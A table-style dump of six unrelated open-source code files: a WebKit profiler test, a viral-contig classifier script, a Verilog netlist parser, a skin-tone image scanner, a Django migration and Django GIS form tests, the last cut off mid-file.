repo_name | path | copies | size | content | license
---|---|---|---|---|---|
attilahorvath/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/profiler_unittest.py | 124 | 5111 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.system.platforminfo_mock import MockPlatformInfo
from webkitpy.common.system.systemhost_mock import MockSystemHost
from .profiler import ProfilerFactory, GooglePProf
class ProfilerFactoryTest(unittest.TestCase):
def _assert_default_profiler_name(self, os_name, expected_profiler_name):
profiler_name = ProfilerFactory.default_profiler_name(MockPlatformInfo(os_name))
self.assertEqual(profiler_name, expected_profiler_name)
def test_default_profilers(self):
self._assert_default_profiler_name('mac', 'iprofiler')
self._assert_default_profiler_name('linux', 'perf')
self._assert_default_profiler_name('win32', None)
self._assert_default_profiler_name('freebsd', None)
def test_default_profiler_output(self):
host = MockSystemHost()
self.assertFalse(host.filesystem.exists("/tmp/output"))
        # Default mocks are Mac, so iprofiler should be the default.
profiler = ProfilerFactory.create_profiler(host, '/bin/executable', '/tmp/output')
self.assertTrue(host.filesystem.exists("/tmp/output"))
self.assertEqual(profiler._output_path, "/tmp/output/test.dtps")
# Linux defaults to perf.
host.platform.os_name = 'linux'
profiler = ProfilerFactory.create_profiler(host, '/bin/executable', '/tmp/output')
self.assertEqual(profiler._output_path, "/tmp/output/test.data")
class GooglePProfTest(unittest.TestCase):
def test_pprof_output_regexp(self):
pprof_output = """
sometimes
there
is
junk before the total line
Total: 3770 samples
76 2.0% 2.0% 104 2.8% lookup (inline)
60 1.6% 3.6% 60 1.6% FL_SetPrevious (inline)
56 1.5% 5.1% 56 1.5% MaskPtr (inline)
51 1.4% 6.4% 222 5.9% WebCore::HTMLTokenizer::nextToken
42 1.1% 7.6% 47 1.2% WTF::Vector::shrinkCapacity
35 0.9% 8.5% 35 0.9% WTF::RefPtr::get (inline)
33 0.9% 9.4% 43 1.1% append (inline)
29 0.8% 10.1% 67 1.8% WTF::StringImpl::deref (inline)
29 0.8% 10.9% 100 2.7% add (inline)
28 0.7% 11.6% 28 0.7% WebCore::QualifiedName::localName (inline)
25 0.7% 12.3% 27 0.7% WebCore::Private::addChildNodesToDeletionQueue
24 0.6% 12.9% 24 0.6% __memcpy_ssse3_back
23 0.6% 13.6% 23 0.6% intHash (inline)
23 0.6% 14.2% 76 2.0% tcmalloc::FL_Next
23 0.6% 14.8% 95 2.5% tcmalloc::FL_Push
22 0.6% 15.4% 22 0.6% WebCore::MarkupTokenizerBase::InputStreamPreprocessor::peek (inline)
"""
expected_first_ten_lines = """ 76 2.0% 2.0% 104 2.8% lookup (inline)
60 1.6% 3.6% 60 1.6% FL_SetPrevious (inline)
56 1.5% 5.1% 56 1.5% MaskPtr (inline)
51 1.4% 6.4% 222 5.9% WebCore::HTMLTokenizer::nextToken
42 1.1% 7.6% 47 1.2% WTF::Vector::shrinkCapacity
35 0.9% 8.5% 35 0.9% WTF::RefPtr::get (inline)
33 0.9% 9.4% 43 1.1% append (inline)
29 0.8% 10.1% 67 1.8% WTF::StringImpl::deref (inline)
29 0.8% 10.9% 100 2.7% add (inline)
28 0.7% 11.6% 28 0.7% WebCore::QualifiedName::localName (inline)
"""
host = MockSystemHost()
profiler = GooglePProf(host, '/bin/executable', '/tmp/output')
self.assertEqual(profiler._first_ten_lines_of_profile(pprof_output), expected_first_ten_lines)
| bsd-3-clause |
alexcritschristoph/CircMG | classify.py | 4 | 5634 | '''
Alex Crits-Christoph
License: GPL3
Classifies viral metagenomic contigs using a random forest classifier built on public datasets.
'''
import sys
import numpy
import subprocess
import os
import cPickle as pickle
from sklearn.ensemble import RandomForestClassifier
from collections import defaultdict
import os.path
from Bio import SeqIO
import argparse
def main(input_file, prodigal_path, min_contig):
contigs = {}
#Check that prodigal is installed
	try:
		if subprocess.call(["which", prodigal_path]) != 0:
			raise OSError("prodigal not found")
	except:
		print "[ERROR] Prodigal is not installed or not available at the specified path."
		sys.exit(1)
#Check that the input file exists
if not os.path.isfile(input_file):
print "[ERROR] The input file does not appear to exist."
sys.exit(1)
#Remove old output
with open(os.devnull, 'wb') as devnull:
subprocess.check_call(['rm','-rf','./' + input_file.split("/")[-1].split(".")[0] + '_output/'], stdout=devnull, stderr=subprocess.STDOUT)
#Make new directory
with open(os.devnull, 'wb') as devnull:
subprocess.check_call(['mkdir','./' + input_file.split("/")[-1].split(".")[0] + '_output/'], stdout=devnull, stderr=subprocess.STDOUT)
#Keep only contigs > min_length
print "[1] Excluding contigs less than " + str(min_contig) + " bp in length."
handle = open(input_file, "rU")
l = SeqIO.parse(handle, "fasta")
new_input = './' + input_file.split("/")[-1].split(".")[0] + '_output/' + input_file.split("/")[-1].split(".")[0] + "_filtered.fa"
f = open(new_input, 'a+')
contig_list = {}
for s in l:
if len(s.seq) >= int(min_contig):
f.write(">" + s.id + "\n")
f.write(str(s.seq) + "\n")
contig_list[s.id] = s.seq
f.close()
#Run prodigal
print "[2] Predicting genes and proteins with Prodigal (this could take a while)..."
sts = subprocess.Popen(prodigal_path + ' -p meta -f gff -o ./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.gff -i ' + new_input + ' -q', shell=True).wait()
print "[3] Generating features for machine learning..."
contigs = []
genes = {}
introns = {}
confs = {}
strands = {}
with open('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.gff', "r") as f:
previous_end = 0
previous_strand = -1
previous_contig = ""
for line in f:
if line.startswith("#"):
previous_end = 0
previous_strand = 0
if not line.startswith("#"):
#get gene size
contig = line.split()[0]
s = int(line.split()[3])
e = int(line.split()[4])
gene_size = int(e) - int(s)
#get reading strand (-) or (+)
stra = line.split()[6]
if stra == "+":
strand = 1.0
else:
strand = 0.0
if contig != previous_contig:
previous_contig = contig
previous_end = e
previous_strand = strand
contigs.append(contig)
genes[contig] = []
introns[contig] = []
confs[contig] = []
strands[contig] = []
continue
#get intron length
intron_length = s - previous_end
if strand == previous_strand:
strandedness = 1
else:
strandedness = 0
previous_end = e
previous_strand = strand
#get conf
conf = float(line.split("conf=")[1].split(";")[0])
genes[contig].append(gene_size)
introns[contig].append(intron_length)
confs[contig].append(conf)
strands[contig].append(strandedness)
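	# Hypothetical GFF data line, for reference (field values are illustrative):
	#   contig_1  Prodigal_v2.6  CDS  100  400  55.1  +  0  ID=1_1;...;conf=99.25;...
	# The loop above turns it into gene_size = 300, strand = 1.0, conf = 99.25.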
f = open('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.dat','w+')
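	# Each line written below is one feature vector (only contigs with more
	# than 10 genes are kept): mean gene length, mean intergenic gap, mean
	# Prodigal confidence, and the fraction of genes sharing a strand with
	# their predecessor.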
for contig in contigs:
if len(genes[contig]) > 10:
f.write(str(float(sum(genes[contig])) / len(genes[contig])) + "," + str(float(sum(introns[contig])) / len(introns[contig])) + "," + str(float(sum(confs[contig])) / len(confs[contig])) + "," + str(float(sum(strands[contig])) / len(strands[contig])) + "\n")
f.close()
print "[4] Loading classifier into memory..."
try:
		forest_fit = pickle.load(open("./data/classifier.p", "rb"))
except:
print "Error: could not load the classifier. Make sure it can be found in ./data/classifier.p."
sys.exit(1)
print "[5] Loading feature data..."
testdata = numpy.loadtxt('./' + input_file.split("/")[-1].split(".")[0] + '_output/temp.dat', delimiter=",")
print "[6] Classifing features..."
classified = list(forest_fit.predict(testdata))
j = 0
print "Viral contigs:"
viral_contigs = []
results_string = ''
for i in classified:
if i == 1:
results_string += str(contigs[j]) + ","
viral_contigs.append(contigs[j])
j += 1
results_string = results_string.rstrip(",")
print results_string
print "[7] Saving results to ./" + input_file.split("/")[-1].split(".")[0] + '_output/viral.fna'
f = open('./' + input_file.split("/")[-1].split(".")[0] + '_output/viral.fna', 'a+')
for contig in viral_contigs:
f.write(">" + str(contig) + "\n")
f.write(str(contig_list[contig]) + "\n")
print "[8] Complete. Cleaning up and exiting..."
if __name__ == '__main__':
__author__ = "Alex Crits-Christoph"
parser = argparse.ArgumentParser(description='Classifies viral metagenomic contigs using a random forest classifier built on public datasets. Features are gene length, intergenic space length, strandedness, and prodigal calling gene confidence.')
parser.add_argument('-i','--input', help='Input assembly filename',required=True)
parser.add_argument('-m', '--min_contig_size', help='Minimum contig size to use (default: 10 kbp)', required=False)
parser.add_argument('-p', '--prodigal_path', help='Path to prodigal (default: prodigal)', required=False)
args = parser.parse_args()
if args.min_contig_size == None:
args.min_contig_size = 10000
if args.prodigal_path == None:
args.prodigal_path = 'prodigal'
main(args.input, args.prodigal_path, args.min_contig_size) | gpl-2.0 |
mplewis/verilive-server | ivernetp/parsers.py | 2 | 7394 | from .ivl_structures import IvlModule, IvlPort
from .ivl_elabs import IvlElabNetPartSelect, IvlElabPosedge, IvlElabLogic
from .ivl_enums import IvlElabType, IvlPortType, IvlDataDirection
from .utils import leading_spaces, is_local_finder, group_lines
import re
# Used to lookup enum types from strings
ELAB_TYPE_LOOKUP = {
'NetPartSelect': IvlElabType.net_part_select,
'posedge': IvlElabType.posedge,
'logic': IvlElabType.logic
}
def parse_netlist_to_sections(raw_netlist):
"""
Take raw text from a netlist file and turn it into lists of lines grouped
by section.
Sections look like this:
SCOPES:
ELABORATED NODES:
...etc.
Returns a dict.
Keys are the name of the section.
Values are an array of lines that make up that section.
"""
# This regex matches lines that start with a caps letter, contain caps and
# spaces, and are followed by a colon, then any characters
section_regex = '[A-Z][A-Z ]*:.*'
section_finder = re.compile(section_regex)
sections = {}
title = None
section = []
for line in raw_netlist.split('\n'):
if section_finder.match(line):
if not section:
section = None
if title:
sections[title] = section
section = []
title, data = line.split(':')
if data:
section = data.strip()
else:
section.append(line)
if title:
sections[title] = section
return sections
def parse_module_lines(lines, net_manager):
"""
Parse lines that make up a module. Add the module to the proper nets using
the specified NetManager.
Returns an IvlModule object.
"""
module_meta = lines[0]
module_data = lines[1:]
name, supertype, module_type_raw, inst_type = module_meta.split(' ')
module_type = module_type_raw.lstrip('<').rstrip('>')
ports = parse_module_data(module_data, net_manager)
module = IvlModule(name, module_type, ports)
for port in ports:
port.parent_module = module
return module
def parse_module_data(lines, net_manager):
"""
Parse the module data (not the first line, which is metadata).
Returns a list of IvlPort objects created from the module.
"""
ports = []
port = None
for line in lines:
# Port declarations have four leading spaces
if leading_spaces(line) == 4:
if port:
ports.append(port)
port = None
line = line.lstrip(' ')
# reg or wire lines
if line.startswith('reg') or line.startswith('wire'):
is_local = is_local_finder.search(line)
# Line starts with either 'reg' or 'wire'
if line.startswith('reg'):
xtype = IvlPortType.reg
else:
xtype = IvlPortType.wire
# reg: <name>[0:0 count=1]
# wire: <name>[0:0 count=1]
name = line.split(': ')[1].split('[')[0]
# wire: in[0:0 count=1] logic <direction_raw> (eref=0, lref=0)
direction_raw = (line
.split('logic')[1]
.split('(eref')[0]
.strip(' '))
# Convert direction_raw to an IvlDataDirection
try:
direction = IvlDataDirection[direction_raw]
except KeyError:
direction = None
# vector_width=<width>
width = int(line
.split('vector_width=')[1]
.split(' pin_count=')[0])
port = IvlPort(name, xtype, width=width, direction=direction,
is_local=is_local)
# event lines
elif line.startswith('event'):
xtype = IvlPortType.event
# event <name>;
name = line.split('event ')[1].split(';')[0]
# event _s0; ... // <snippet>
snippet = line.split('// ')[1]
port = IvlPort(name, xtype, code_snippet=snippet)
# Port data lines have eight leading spaces
elif leading_spaces(line) == 8:
if port:
net_id, net_name = line.split(': ')[1].split(' ')
net_manager.add_port_to_net(net_id, net_name, port)
if port:
ports.append(port)
return ports
def parse_elab_bundle_lines(lines, net_manager):
"""
Parses lines from an elab into a Logic, Posedge, or NetPartSelect IvlElab
object.
Returns the new IvlElab object.
"""
# posedge -> ...
# NetPartSelect(PV): ...
# logic: ...
xtype_raw = lines[0].split(' -> ')[0].split('(')[0].split(':')[0]
xtype = ELAB_TYPE_LOOKUP[xtype_raw]
info_split = lines[0].split(' ')
if xtype is IvlElabType.net_part_select:
# NetPartSelect(<io_size_flag>): <name> #(.,.,.) \
# off=<offset> wid=<width>
offset = int(info_split[3][4:])
width = int(info_split[4][4:])
# PV vs VP indicates which port is larger, the first or second
io_size_flag = lines[0].split('(')[1].split(')')[0]
if io_size_flag == 'PV':
large_net = IvlDataDirection.output
elif io_size_flag == 'VP':
large_net = IvlDataDirection.input
else:
raise ValueError('Invalid IO size flag: %s' % io_size_flag)
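        # Worked hypothetical header: 'NetPartSelect(PV): sel #(.,.,.) off=8 wid=4'
        # parses to offset=8, width=4 and large_net=IvlDataDirection.output.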
elif xtype is IvlElabType.logic:
# logic: <logic_type> ...
logic_type = info_split[1]
input_nets = []
output_nets = []
for line in lines[1:]:
# Net lines have four leading spaces. Example line:
# 0 pin0 I (strong0 strong1): 0x7fbd08d0a630 bargraph_testbench.b._s0
line_split = line.split(' ')
data_dir = line_split[6]
net_id = line_split[9]
net_name = line_split[10]
net = net_manager.get_or_make_net(net_id, net_name)
if data_dir == 'I':
input_nets.append(net)
elif data_dir == 'O':
output_nets.append(net)
else:
raise ValueError('Invalid net data direction: %s' % data_dir)
if xtype is IvlElabType.net_part_select:
elab = IvlElabNetPartSelect(input_nets[0], output_nets[0], large_net,
offset, width)
elif xtype is IvlElabType.posedge:
elab = IvlElabPosedge(input_nets[0])
elif xtype is IvlElabType.logic:
elab = IvlElabLogic(logic_type, input_nets, output_nets[0])
else:
raise ValueError('Invalid elab xtype: %s' % xtype)
return elab
def parse_modules_and_elabs(raw_netlist, net_manager):
"""
Parses a raw netlist into its IvlModule and IvlElab objects.
Returns a tuple: (modules, elabs)
modules is a list of IvlModule objects.
elabs is a list of IvlElab objects.
"""
sections = parse_netlist_to_sections(raw_netlist)
modules_lines = group_lines(sections['SCOPES'])
elab_bundles_lines = group_lines(sections['ELABORATED NODES'])
modules = [parse_module_lines(lines, net_manager)
for lines in modules_lines]
elabs = [parse_elab_bundle_lines(lines, net_manager)
for lines in elab_bundles_lines]
return modules, elabs
| mit |
wolfdale/NSFW-ImageScanner | Test.py | 1 | 1366 | from PIL import Image
THRESHOLD = 0.5
def main():
	im = Image.open('Input_Image.jpg')
	ycbcr_image = Image.new('RGB', im.size, 'black')
	ycbcr = convert_to_ycbcr(im)
'''
pix=ycbcr_image.load()
for i in range(0, im.size[0]):
for j in range(0, im.size[1]):
pix[i, j] = tuple(map(int, ycbcr[i * im.size[1] + j]))
ycbcr_image.save('nin.jpg')
'''
def judge(sample):
y, cb, cr = sample
return 80 <= cb <= 120 and 133 <= cr <= 173
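	# Hypothetical examples: a typical skin-tone sample (Y, Cb, Cr) =
	# (150, 105, 150) passes both range checks above, while a saturated
	# blue pixel (roughly 41, 240, 110) fails on Cb.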
judged = map(judge, ycbcr)
print judged.count(True)
print judged.count(False)
print len(judged)
rating = float(judged.count(True)) / len(judged)
print rating > THRESHOLD, rating*100
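	# Illustrative arithmetic: if 2262 of 3770 sampled pixels pass judge(),
	# rating = 0.6, so the image is flagged (0.6 > THRESHOLD of 0.5).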
# Function to convert an RGB image to YCbCr (ITU-R BT.601 coefficients)
def convert_to_ycbcr(im):
dummy=[]
x = im.size[0]
y = im.size[1]
for i in range(x):
for j in range(y):
r, g, b = im.getpixel((i,j))
dummy.append( (
16 + (65.738 * r + 129.057 * g + 25.064 * b) / 256,
128 + (-37.945 * r - 74.494 * g + 112.439 * b) / 256,
128 + (112.439 * r - 94.154 * g - 18.285 * b) / 256
))
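			# Sanity check on the constants above: pure white (255, 255, 255)
			# maps to roughly (235, 128, 128), i.e. neutral chroma, which
			# judge() correctly rejects as skin (Cb = 128 > 120).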
return dummy
if __name__=='__main__':
main()
| mit |
dsajkl/123 | common/djangoapps/student/migrations/0018_auto.py | 188 | 10521 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'CourseEnrollment', fields ['created']
db.create_index('student_courseenrollment', ['created'])
def backwards(self, orm):
# Removing index on 'CourseEnrollment', fields ['created']
db.delete_index('student_courseenrollment', ['created'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.courseenrollment': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'student.pendingemailchange': {
'Meta': {'object_name': 'PendingEmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.pendingnamechange': {
'Meta': {'object_name': 'PendingNameChange'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'null': 'True', 'blank': 'True'}),
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'occupation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'telephone_number': ('django.db.models.fields.CharField', [], {'max_length': '25', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"})
},
'student.usertestgroup': {
'Meta': {'object_name': 'UserTestGroup'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'})
}
}
complete_apps = ['student']
| agpl-3.0 |
Adnn/django | tests/gis_tests/test_geoforms.py | 292 | 14830 | from unittest import skipUnless
from django.contrib.gis import forms
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.geos import GEOSGeometry
from django.forms import ValidationError
from django.test import SimpleTestCase, skipUnlessDBFeature
from django.utils import six
from django.utils.html import escape
@skipUnless(HAS_GDAL, "GeometryFieldTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class GeometryFieldTest(SimpleTestCase):
def test_init(self):
"Testing GeometryField initialization with defaults."
fld = forms.GeometryField()
for bad_default in ('blah', 3, 'FoO', None, 0):
self.assertRaises(ValidationError, fld.clean, bad_default)
def test_srid(self):
"Testing GeometryField with a SRID set."
# Input that doesn't specify the SRID is assumed to be in the SRID
# of the input field.
fld = forms.GeometryField(srid=4326)
geom = fld.clean('POINT(5 23)')
self.assertEqual(4326, geom.srid)
# Making the field in a different SRID from that of the geometry, and
# asserting it transforms.
fld = forms.GeometryField(srid=32140)
tol = 0.0000001
xform_geom = GEOSGeometry('POINT (951640.547328465 4219369.26171664)', srid=32140)
# The cleaned geometry should be transformed to 32140.
cleaned_geom = fld.clean('SRID=4326;POINT (-95.363151 29.763374)')
self.assertTrue(xform_geom.equals_exact(cleaned_geom, tol))
def test_null(self):
"Testing GeometryField's handling of null (None) geometries."
# Form fields, by default, are required (`required=True`)
fld = forms.GeometryField()
with six.assertRaisesRegex(self, forms.ValidationError,
"No geometry value provided."):
fld.clean(None)
# This will clean None as a geometry (See #10660).
fld = forms.GeometryField(required=False)
self.assertIsNone(fld.clean(None))
def test_geom_type(self):
"Testing GeometryField's handling of different geometry types."
# By default, all geometry types are allowed.
fld = forms.GeometryField()
for wkt in ('POINT(5 23)', 'MULTIPOLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'LINESTRING(0 0, 1 1)'):
self.assertEqual(GEOSGeometry(wkt), fld.clean(wkt))
pnt_fld = forms.GeometryField(geom_type='POINT')
self.assertEqual(GEOSGeometry('POINT(5 23)'), pnt_fld.clean('POINT(5 23)'))
# a WKT for any other geom_type will be properly transformed by `to_python`
self.assertEqual(GEOSGeometry('LINESTRING(0 0, 1 1)'), pnt_fld.to_python('LINESTRING(0 0, 1 1)'))
# but rejected by `clean`
self.assertRaises(forms.ValidationError, pnt_fld.clean, 'LINESTRING(0 0, 1 1)')
def test_to_python(self):
"""
Testing to_python returns a correct GEOSGeometry object or
a ValidationError
"""
fld = forms.GeometryField()
# to_python returns the same GEOSGeometry for a WKT
for wkt in ('POINT(5 23)', 'MULTIPOLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'LINESTRING(0 0, 1 1)'):
self.assertEqual(GEOSGeometry(wkt), fld.to_python(wkt))
# but raises a ValidationError for any other string
for wkt in ('POINT(5)', 'MULTI POLYGON(((0 0, 0 1, 1 1, 1 0, 0 0)))', 'BLAH(0 0, 1 1)'):
self.assertRaises(forms.ValidationError, fld.to_python, wkt)
def test_field_with_text_widget(self):
class PointForm(forms.Form):
pt = forms.PointField(srid=4326, widget=forms.TextInput)
form = PointForm()
cleaned_pt = form.fields['pt'].clean('POINT(5 23)')
self.assertEqual(cleaned_pt, GEOSGeometry('POINT(5 23)'))
self.assertEqual(4326, cleaned_pt.srid)
point = GEOSGeometry('SRID=4326;POINT(5 23)')
form = PointForm(data={'pt': 'POINT(5 23)'}, initial={'pt': point})
self.assertFalse(form.has_changed())
@skipUnless(HAS_GDAL, "SpecializedFieldTest needs GDAL support")
@skipUnlessDBFeature("gis_enabled")
class SpecializedFieldTest(SimpleTestCase):
def setUp(self):
self.geometries = {
'point': GEOSGeometry("SRID=4326;POINT(9.052734375 42.451171875)"),
'multipoint': GEOSGeometry("SRID=4326;MULTIPOINT("
"(13.18634033203125 14.504356384277344),"
"(13.207969665527 14.490966796875),"
"(13.177070617675 14.454917907714))"),
'linestring': GEOSGeometry("SRID=4326;LINESTRING("
"-8.26171875 -0.52734375,"
"-7.734375 4.21875,"
"6.85546875 3.779296875,"
"5.44921875 -3.515625)"),
'multilinestring': GEOSGeometry("SRID=4326;MULTILINESTRING("
"(-16.435546875 -2.98828125,"
"-17.2265625 2.98828125,"
"-0.703125 3.515625,"
"-1.494140625 -3.33984375),"
"(-8.0859375 -5.9765625,"
"8.525390625 -8.7890625,"
"12.392578125 -0.87890625,"
"10.01953125 7.646484375))"),
